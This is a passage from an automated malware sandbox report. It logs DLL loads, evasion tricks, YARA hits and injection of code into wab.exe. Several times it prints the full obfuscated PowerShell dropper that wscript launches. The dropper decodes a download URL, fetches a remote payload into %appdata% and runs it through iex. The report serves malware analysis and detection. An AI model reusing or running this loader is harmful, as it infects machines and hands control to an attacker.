              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: napinsp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: pnrpnsp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshbth.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: nlaapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iphlpapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mswsock.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dnsapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winrnr.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: fwpuclnt.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasadhlp.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: wininet.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: iertutil.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: sspicli.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: windows.storage.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: wldp.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: profapi.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: kernel.appcore.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: ondemandconnroutehelper.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: winhttp.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: mswsock.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: iphlpapi.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: winnsi.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: urlmon.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: srvcli.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: netutils.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: dnsapi.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: rasadhlp.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: fwpuclnt.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: schannel.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: mskeyprotect.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: ntasn1.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: msasn1.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: dpapi.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: cryptsp.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: rsaenh.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: cryptbase.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: gpapi.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: ncrypt.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: ncryptsslp.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: mscoree.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: version.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: vcruntime140_clr0400.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: ucrtbase_clr0400.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: uxtheme.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: wbemcomn.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: amsi.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: userenv.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: avicap32.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: msvfw32.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: winmm.dll
              Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32
              Source: Window Recorder | Window detected: More than 3 window changes detected
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
              Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbZ source: powershell.exe, 0000000D.00000002.1845952673.0000000007091000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: qm.Core.pdb source: powershell.exe, 0000000D.00000002.1849554287.0000000008208000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 0000000D.00000002.1845952673.0000000007091000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: CallSite.Targetore.pdbS source: powershell.exe, 0000000D.00000002.1849045722.00000000081B0000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb source: powershell.exe, 0000000D.00000002.1845952673.0000000007091000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 0000000D.00000002.1849554287.0000000008208000.00000004.00000020.00020000.00000000.sdmp

              Data Obfuscation

              Source: C:\Windows\System32\wscript.exe | Anti Malware Scan Interface: .Run("powershell "$Coddle = 1;$Pararctalia='Su';$Pararctalia+='bstrin';$Pararctalia+='g';Function Tilsynsraads($Paradox", "0")
              Source: Yara match | File source: 0000000D.00000002.1850717650.0000000008D34000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 0000000D.00000002.1850007327.0000000008450000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 0000000D.00000002.1843333872.0000000005723000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000009.00000002.2000635803.0000012C90073000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: FromBase64String($Atombevbnes)$global:Wienerplsens = [System.Text.Encoding]::ASCII.GetString($Adhesivemeter)$global:Smithson=$Wienerplsens.substring($Arkitekttegnes,$sybaritisk)<#Fakeers Galloper Digi
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: GetDelegateForFunctionPointer((Kdedes $Bekldningsreglerne $Tegningslsnings221), (Erlagte @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:savbukkes = [AppDomain]::CurrentDomain.GetAssembl
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Telepolitik)), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule($Byggerettens, $false).DefineType($Indgik, $Ci
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: FromBase64String($Atombevbnes)$global:Wienerplsens = [System.Text.Encoding]::ASCII.GetString($Adhesivemeter)$global:Smithson=$Wienerplsens.substring($Arkitekttegnes,$sybaritisk)<#Fakeers Galloper Digi
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Coddle = 1;$Pararctalia='Su';$Pararctalia+='bstrin';$Pararctalia+='g';Function Tilsynsraads($Paradoxer){$Afprver=$Paradoxer.Length-$Coddle;For($Publikummer=5;$Publikummer -lt $Afprver;$Publikummer+=6){$Printerdefinitionerne+=$Paradoxer.$Pararctalia.Invoke( $Publikummer, $Coddle);}$Printerdefinitionerne;}function Handelsmssiges($Overimaginatively){& ($Nondiligently106) ($Overimaginatively);}$Toniskes=Tilsynsraads 'Mana,MWeddioFell,zUncomi C.pilNonbelstanga Ripo/Stakn5Forho.Mythi0 Unde Nonvo( DispW StaniEarthnU.vetdBrystoOutbiwUnives pakk Kirj.N eratTunst. Revo1Remit0tamgs.Brde.0 Rust;Tanch .onomWAntiriSansenomdri6Rip n4Lilje;M als AlloxDoxyc6Folkl4 marg;Oxa,i AmararGaskovRock,:Smile1Eleus2S.xte1recli. ,ndr0Ge.er)Henst BarbaGoutluegadsbcKindlkBumpio .lab/Capit2Vo.dt0Lenda1 She,0 Bus 0 her1Bes,y0Synge1Contr R.stiFDukkeiF.rberslingeEkspafEnteroImprexD,maj/Ureal1Lever2Polyp1 Micr. .gat0Buhko ';$Mellite=Tilsynsraads ' CranU Skams Txthe b rkrS.iff-PrenoALe.sigAlkohe VelsnMi.sitVoice ';$Overmuch=Tilsynsraads 'CurnehGemmitSievetRor.ypFr.bisE,xli:Lealn/Cara /T.ldfwTelotw E fawDamno.,orsmsKubepeTrkkrnUncubdNonlus verip SaloaInobtcAfleveSanda.Di.crc Syllo Wo,emS.ald/Bo.sepFe.rorSexbooKlapp/IntemdPhysilOu,ro/Daryltdisorbhe,vifLoadsv ,ephparr,udUfor. 
';$Oscheolith=Tilsynsraads 'Sutte> Fluo ';$Nondiligently106=Tilsynsraads 'SkabeiDetrae.ligtxrub i ';$Taxaers='totemites';Handelsmssiges (Tilsynsraads 'HydroSObte.e SnostStipu-Aqua,CfoldeoSkuldn ,seut Bnd,e,aseknVerdetBlush Raps-StenrP.lotsaJern tTopo,hOkays S avkTCorra: Vara\Koer,FUdbrelKlippoTota pMandip Tid i OvernGymnoeOvervsGo alsStrmf.Unsa,t Ild.xDataot.dsta Rec.n-BlubbV aageaAbstilNonreuRan.feSlegf elon$Mist,Tmaraua Autox Rubia eloneMy derUnlansIncha;Forto ');Handelsmssiges (Tilsynsraads 'Behani Gra.fChalc Udfo ( sphotUdsigeKrukksWennitNy.ed-Paddop PlagavadostIngloh krue Ree eTStati:Hydro\ TobaF Semil,etstoLifesp F rmpD.spliForstnF iakeEs,ivsDk ensTer.i.Defort TechxCe trtLys.r)In ba{Srg,se Krusx,noggiMynd,ttilvi}Akti,; Kame ');$Strmpeholderens = Tilsynsraads 'G jstefornic Un thUnpawo Af r Rockw%SpatiaargolpAarempBu ked Nd aaSt,klt ScruaVictu%Va.id\ Und,Bm,llerEkspei Skama PagnrTelefbStrafeMisunrUnoblrMohamySprge.SekunM S.rdiEgnsplN kke Justi&Ell c&Lgelf rivieUnst cAdriah Likvo nage ,ape$Tactu ';Handelsmssiges (Tilsynsraads ' Nedf$NonligKoncelArts oDobb b D,oma K ynlBebyg:Be,tiPRevokr orsoTidsivMillii ,rdis SolaiTheopoRefern Promm B dleB strnAlte t ,akk=A del(grif cHexamm stild .egu Fedt/Affalc Indb Ska.e$CirkuSBal,lt TrigrroquemHjsp pSkimpe etalhSukkeo O.aclbeviddGlibnevan.urPreexeTidv.nSkrivsovers)Ricci ');Handelsmssiges (Tilsynsraads 'Optrd$skullg GruplstyrtoTrigobTriu,aArti,lStron:SkorzSPotbah .araaMonetdAlthio PlanwWidgi=Grnse$ S,inOKantav ,rane ,opcrBattamTipvou S.necRunouhA sol.Ou wrsSemicpDisa l BudsiChorttSemij(Succo$ atlaO.kytssFoodlcTuxedhS.ciaeOlavuo MumllAf.oliB,holtBa
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Coddle = 1;$Pararctalia='Su';$Pararctalia+='bstrin';$Pararctalia+='g';Function Tilsynsraads($Paradoxer){$Afprver=$Paradoxer.Length-$Coddle;For($Publikummer=5;$Publikummer -lt $Afprver;$Publikummer+=6){$Printerdefinitionerne+=$Paradoxer.$Pararctalia.Invoke( $Publikummer, $Coddle);}$Printerdefinitionerne;}function Handelsmssiges($Overimaginatively){& ($Nondiligently106) ($Overimaginatively);}$Toniskes=Tilsynsraads 'Mana,MWeddioFell,zUncomi C.pilNonbelstanga Ripo/Stakn5Forho.Mythi0 Unde Nonvo( DispW StaniEarthnU.vetdBrystoOutbiwUnives pakk Kirj.N eratTunst. Revo1Remit0tamgs.Brde.0 Rust;Tanch .onomWAntiriSansenomdri6Rip n4Lilje;M als AlloxDoxyc6Folkl4 marg;Oxa,i AmararGaskovRock,:Smile1Eleus2S.xte1recli. ,ndr0Ge.er)Henst BarbaGoutluegadsbcKindlkBumpio .lab/Capit2Vo.dt0Lenda1 She,0 Bus 0 her1Bes,y0Synge1Contr R.stiFDukkeiF.rberslingeEkspafEnteroImprexD,maj/Ureal1Lever2Polyp1 Micr. .gat0Buhko ';$Mellite=Tilsynsraads ' CranU Skams Txthe b rkrS.iff-PrenoALe.sigAlkohe VelsnMi.sitVoice ';$Overmuch=Tilsynsraads 'CurnehGemmitSievetRor.ypFr.bisE,xli:Lealn/Cara /T.ldfwTelotw E fawDamno.,orsmsKubepeTrkkrnUncubdNonlus verip SaloaInobtcAfleveSanda.Di.crc Syllo Wo,emS.ald/Bo.sepFe.rorSexbooKlapp/IntemdPhysilOu,ro/Daryltdisorbhe,vifLoadsv ,ephparr,udUfor. 
';$Oscheolith=Tilsynsraads 'Sutte> Fluo ';$Nondiligently106=Tilsynsraads 'SkabeiDetrae.ligtxrub i ';$Taxaers='totemites';Handelsmssiges (Tilsynsraads 'HydroSObte.e SnostStipu-Aqua,CfoldeoSkuldn ,seut Bnd,e,aseknVerdetBlush Raps-StenrP.lotsaJern tTopo,hOkays S avkTCorra: Vara\Koer,FUdbrelKlippoTota pMandip Tid i OvernGymnoeOvervsGo alsStrmf.Unsa,t Ild.xDataot.dsta Rec.n-BlubbV aageaAbstilNonreuRan.feSlegf elon$Mist,Tmaraua Autox Rubia eloneMy derUnlansIncha;Forto ');Handelsmssiges (Tilsynsraads 'Behani Gra.fChalc Udfo ( sphotUdsigeKrukksWennitNy.ed-Paddop PlagavadostIngloh krue Ree eTStati:Hydro\ TobaF Semil,etstoLifesp F rmpD.spliForstnF iakeEs,ivsDk ensTer.i.Defort TechxCe trtLys.r)In ba{Srg,se Krusx,noggiMynd,ttilvi}Akti,; Kame ');$Strmpeholderens = Tilsynsraads 'G jstefornic Un thUnpawo Af r Rockw%SpatiaargolpAarempBu ked Nd aaSt,klt ScruaVictu%Va.id\ Und,Bm,llerEkspei Skama PagnrTelefbStrafeMisunrUnoblrMohamySprge.SekunM S.rdiEgnsplN kke Justi&Ell c&Lgelf rivieUnst cAdriah Likvo nage ,ape$Tactu ';Handelsmssiges (Tilsynsraads ' Nedf$NonligKoncelArts oDobb b D,oma K ynlBebyg:Be,tiPRevokr orsoTidsivMillii ,rdis SolaiTheopoRefern Promm B dleB strnAlte t ,akk=A del(grif cHexamm stild .egu Fedt/Affalc Indb Ska.e$CirkuSBal,lt TrigrroquemHjsp pSkimpe etalhSukkeo O.aclbeviddGlibnevan.urPreexeTidv.nSkrivsovers)Ricci ');Handelsmssiges (Tilsynsraads 'Optrd$skullg GruplstyrtoTrigobTriu,aArti,lStron:SkorzSPotbah .araaMonetdAlthio PlanwWidgi=Grnse$ S,inOKantav ,rane ,opcrBattamTipvou S.necRunouhA sol.Ou wrsSemicpDisa l BudsiChorttSemij(Succo$ atlaO.kytssFoodlcTuxedhS.ciaeOlavuo MumllAf.oliB,holtBa
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Code function: 9_2_00007FF886F93414 pushfd ; iretd  9_2_00007FF886F93415
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Code function: 9_2_00007FF886F96FE4 pushad ; iretd  9_2_00007FF886F96FE5
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Code function: 9_2_00007FF886F97A4B push esi; iretd  9_2_00007FF886F97A4C
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Code function: 9_2_00007FF886F97D14 push ebx; iretd  9_2_00007FF886F97D15
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Code function: 13_2_072108C2 push eax; mov dword ptr [esp], ecx  13_2_07210AC4
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Code function: 13_2_07210AAC push eax; mov dword ptr [esp], ecx  13_2_07210AC4
              Source: C:\Windows\System32\wscript.exe  Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Process information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Windows Mail\wab.exe  Process information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Memory allocated: 2A70000 memory reserve | memory write watch
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Memory allocated: 21D40000 memory reserve | memory write watch
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Memory allocated: 21C10000 memory reserve | memory write watch
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6669
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3220
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 8452
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1359
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Window / User API: threadDelayed 4840
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Window / User API: threadDelayed 4953
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7428 Thread sleep time: -2767011611056431s >= -30000s
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7648 Thread sleep count: 8452 > 30
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7636 Thread sleep count: 1359 > 30
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7688 Thread sleep time: -6456360425798339s >= -30000s
              Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7196 Thread sleep count: 32 > 30
              Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7196 Thread sleep time: -29514790517935264s >= -30000s
              Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7080 Thread sleep count: 4840 > 30
              Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7080 Thread sleep count: 4953 > 30
              Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
              Source: C:\Program Files (x86)\Windows Mail\wab.exe File Volume queried: C:\ FullSizeInformation
              Source: powershell.exe, 00000009.00000002.2018581761.0000012CF68E0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWk%SystemRoot%\system32\mswsock.dlly
              Source: wab.exe, 00000011.00000002.2582688527.00000000062CF000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000011.00000002.2582688527.000000000629C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process queried: DebugPort
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Process queried: DebugPort
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 13_2_00EFD6E4 LdrInitializeThunk,LdrInitializeThunk,13_2_00EFD6E4
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Memory allocated: page read and write | page guard

              HIPS / PFW / Operating System Protection Evasion

              Source: Yara match File source: amsi64_7308.amsi.csv, type: OTHER
              Source: Yara match File source: Process Memory Space: powershell.exe PID: 7308, type: MEMORYSTR
              Source: Yara match File source: Process Memory Space: powershell.exe PID: 7588, type: MEMORYSTR
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 3CE0000
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 2A7FE48
              Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Coddle = 1;$Pararctalia='Su';$Pararctalia+='bstrin';$Pararctalia+='g';Function Tilsynsraads($Paradoxer){$Afprver=$Paradoxer.Length-$Coddle;For($Publikummer=5;$Publikummer -lt $Afprver;$Publikummer+=6){$Printerdefinitionerne+=$Paradoxer.$Pararctalia.Invoke( $Publikummer, $Coddle);}$Printerdefinitionerne;}function Handelsmssiges($Overimaginatively){& ($Nondiligently106) ($Overimaginatively);}$Toniskes=Tilsynsraads 'Mana,MWeddioFell,zUncomi C.pilNonbelstanga Ripo/Stakn5Forho.Mythi0 Unde Nonvo( DispW StaniEarthnU.vetdBrystoOutbiwUnives pakk Kirj.N eratTunst. Revo1Remit0tamgs.Brde.0 Rust;Tanch .onomWAntiriSansenomdri6Rip n4Lilje;M als AlloxDoxyc6Folkl4 marg;Oxa,i AmararGaskovRock,:Smile1Eleus2S.xte1recli. ,ndr0Ge.er)Henst BarbaGoutluegadsbcKindlkBumpio .lab/Capit2Vo.dt0Lenda1 She,0 Bus 0 her1Bes,y0Synge1Contr R.stiFDukkeiF.rberslingeEkspafEnteroImprexD,maj/Ureal1Lever2Polyp1 Micr. .gat0Buhko ';$Mellite=Tilsynsraads ' CranU Skams Txthe b rkrS.iff-PrenoALe.sigAlkohe VelsnMi.sitVoice ';$Overmuch=Tilsynsraads 'CurnehGemmitSievetRor.ypFr.bisE,xli:Lealn/Cara /T.ldfwTelotw E fawDamno.,orsmsKubepeTrkkrnUncubdNonlus verip SaloaInobtcAfleveSanda.Di.crc Syllo Wo,emS.ald/Bo.sepFe.rorSexbooKlapp/IntemdPhysilOu,ro/Daryltdisorbhe,vifLoadsv ,ephparr,udUfor. 
';$Oscheolith=Tilsynsraads 'Sutte> Fluo ';$Nondiligently106=Tilsynsraads 'SkabeiDetrae.ligtxrub i ';$Taxaers='totemites';Handelsmssiges (Tilsynsraads 'HydroSObte.e SnostStipu-Aqua,CfoldeoSkuldn ,seut Bnd,e,aseknVerdetBlush Raps-StenrP.lotsaJern tTopo,hOkays S avkTCorra: Vara\Koer,FUdbrelKlippoTota pMandip Tid i OvernGymnoeOvervsGo alsStrmf.Unsa,t Ild.xDataot.dsta Rec.n-BlubbV aageaAbstilNonreuRan.feSlegf elon$Mist,Tmaraua Autox Rubia eloneMy derUnlansIncha;Forto ');Handelsmssiges (Tilsynsraads 'Behani Gra.fChalc Udfo ( sphotUdsigeKrukksWennitNy.ed-Paddop PlagavadostIngloh krue Ree eTStati:Hydro\ TobaF Semil,etstoLifesp F rmpD.spliForstnF iakeEs,ivsDk ensTer.i.Defort TechxCe trtLys.r)In ba{Srg,se Krusx,noggiMynd,ttilvi}Akti,; Kame ');$Strmpeholderens = Tilsynsraads 'G jstefornic Un thUnpawo Af r Rockw%SpatiaargolpAarempBu ked Nd aaSt,klt ScruaVictu%Va.id\ Und,Bm,llerEkspei Skama PagnrTelefbStrafeMisunrUnoblrMohamySprge.SekunM S.rdiEgnsplN kke Justi&Ell c&Lgelf rivieUnst cAdriah Likvo nage ,ape$Tactu ';Handelsmssiges (Tilsynsraads ' Nedf$NonligKoncelArts oDobb b D,oma K ynlBebyg:Be,tiPRevokr orsoTidsivMillii ,rdis SolaiTheopoRefern Promm B dleB strnAlte t ,akk=A del(grif cHexamm stild .egu Fedt/Affalc Indb Ska.e$CirkuSBal,lt TrigrroquemHjsp pSkimpe etalhSukkeo O.aclbeviddGlibnevan.urPreexeTidv.nSkrivsovers)Ricci ');Handelsmssiges (Tilsynsraads 'Optrd$skullg GruplstyrtoTrigobTriu,aArti,lStron:SkorzSPotbah .araaMonetdAlthio PlanwWidgi=Grnse$ S,inOKantav ,rane ,opcrBattamTipvou S.necRunouhA sol.Ou wrsSemicpDisa l BudsiChorttSemij(Succo$ atlaO.kytssFoodlcTuxedhS.ciaeOlavuo MumllAf.oliB,holtBa
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Briarberry.Mil && echo $"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Coddle = 1;$Pararctalia='Su';$Pararctalia+='bstrin';$Pararctalia+='g';Function Tilsynsraads($Paradoxer){$Afprver=$Paradoxer.Length-$Coddle;For($Publikummer=5;$Publikummer -lt $Afprver;$Publikummer+=6){$Printerdefinitionerne+=$Paradoxer.$Pararctalia.Invoke( $Publikummer, $Coddle);}$Printerdefinitionerne;}function Handelsmssiges($Overimaginatively){& ($Nondiligently106) ($Overimaginatively);}$Toniskes=Tilsynsraads 'Mana,MWeddioFell,zUncomi C.pilNonbelstanga Ripo/Stakn5Forho.Mythi0 Unde Nonvo( DispW StaniEarthnU.vetdBrystoOutbiwUnives pakk Kirj.N eratTunst. Revo1Remit0tamgs.Brde.0 Rust;Tanch .onomWAntiriSansenomdri6Rip n4Lilje;M als AlloxDoxyc6Folkl4 marg;Oxa,i AmararGaskovRock,:Smile1Eleus2S.xte1recli. ,ndr0Ge.er)Henst BarbaGoutluegadsbcKindlkBumpio .lab/Capit2Vo.dt0Lenda1 She,0 Bus 0 her1Bes,y0Synge1Contr R.stiFDukkeiF.rberslingeEkspafEnteroImprexD,maj/Ureal1Lever2Polyp1 Micr. .gat0Buhko ';$Mellite=Tilsynsraads ' CranU Skams Txthe b rkrS.iff-PrenoALe.sigAlkohe VelsnMi.sitVoice ';$Overmuch=Tilsynsraads 'CurnehGemmitSievetRor.ypFr.bisE,xli:Lealn/Cara /T.ldfwTelotw E fawDamno.,orsmsKubepeTrkkrnUncubdNonlus verip SaloaInobtcAfleveSanda.Di.crc Syllo Wo,emS.ald/Bo.sepFe.rorSexbooKlapp/IntemdPhysilOu,ro/Daryltdisorbhe,vifLoadsv ,ephparr,udUfor. 
';$Oscheolith=Tilsynsraads 'Sutte> Fluo ';$Nondiligently106=Tilsynsraads 'SkabeiDetrae.ligtxrub i ';$Taxaers='totemites';Handelsmssiges (Tilsynsraads 'HydroSObte.e SnostStipu-Aqua,CfoldeoSkuldn ,seut Bnd,e,aseknVerdetBlush Raps-StenrP.lotsaJern tTopo,hOkays S avkTCorra: Vara\Koer,FUdbrelKlippoTota pMandip Tid i OvernGymnoeOvervsGo alsStrmf.Unsa,t Ild.xDataot.dsta Rec.n-BlubbV aageaAbstilNonreuRan.feSlegf elon$Mist,Tmaraua Autox Rubia eloneMy derUnlansIncha;Forto ');Handelsmssiges (Tilsynsraads 'Behani Gra.fChalc Udfo ( sphotUdsigeKrukksWennitNy.ed-Paddop PlagavadostIngloh krue Ree eTStati:Hydro\ TobaF Semil,etstoLifesp F rmpD.spliForstnF iakeEs,ivsDk ensTer.i.Defort TechxCe trtLys.r)In ba{Srg,se Krusx,noggiMynd,ttilvi}Akti,; Kame ');$Strmpeholderens = Tilsynsraads 'G jstefornic Un thUnpawo Af r Rockw%SpatiaargolpAarempBu ked Nd aaSt,klt ScruaVictu%Va.id\ Und,Bm,llerEkspei Skama PagnrTelefbStrafeMisunrUnoblrMohamySprge.SekunM S.rdiEgnsplN kke Justi&Ell c&Lgelf rivieUnst cAdriah Likvo nage ,ape$Tactu ';Handelsmssiges (Tilsynsraads ' Nedf$NonligKoncelArts oDobb b D,oma K ynlBebyg:Be,tiPRevokr orsoTidsivMillii ,rdis SolaiTheopoRefern Promm B dleB strnAlte t ,akk=A del(grif cHexamm stild .egu Fedt/Affalc Indb Ska.e$CirkuSBal,lt TrigrroquemHjsp pSkimpe etalhSukkeo O.aclbeviddGlibnevan.urPreexeTidv.nSkrivsovers)Ricci ');Handelsmssiges (Tilsynsraads 'Optrd$skullg GruplstyrtoTrigobTriu,aArti,lStron:SkorzSPotbah .araaMonetdAlthio PlanwWidgi=Grnse$ S,inOKantav ,rane 